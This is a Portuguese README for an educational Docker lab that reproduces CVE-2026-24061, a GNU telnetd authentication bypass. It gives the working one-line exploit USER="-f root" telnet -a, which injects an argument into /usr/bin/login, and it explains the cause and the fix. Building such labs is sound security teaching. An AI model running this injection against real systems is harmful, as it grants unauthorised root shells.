
Laboratório Docker educacional que demonstra o CVE-2026-24061, um bypass de autenticação no GNU telnetd que permite acesso root por meio de injeção de argumentos na variável de ambiente USER.
Este repositório contém um laboratório simples em Docker para demonstrar a vulnerabilidade CVE-2026-24061. Ela permite bypass de autenticação e acesso como root no GNU telnetd, no linux.
O objetivo é exclusivamente educacional.
docker build -t cve-2026-24061 .
docker run -it -p 2323:23 cve-2026-24061
Em outro terminal, execute:
USER="-f root" telnet -a localhost 2323
Após isso, o acesso será concedido diretamente como root, sem solicitação de senha.
A falha ocorre devido a uma injeção de argumentos durante a invocação do utilitário /usr/bin/login. O telnetd constrói dinamicamente a linha de comando usada para chamar o login e inclui o valor da variável de ambiente USER por meio do placeholder %U, sem qualquer sanitização.
Como o utilitário login aceita a opção -f, que ignora a autenticação por senha, um atacante pode definir USER="-f root" e forçar o login direto como root.
Como o telnetd é executado com privilégios elevados, essa manipulação resulta imediatamente em uma shell root sem necessidade de credenciais válidas. A exploração é simples, não exige interação prévia e pode ser facilmente automatizada, o que justifica a pontuação CVSS 9.8.
A vulnerabilidade foi corrigida com a introdução de validação e sanitização da variável USER, bloqueando valores iniciados por hífen e caracteres especiais, impedindo a injeção de argumentos no login.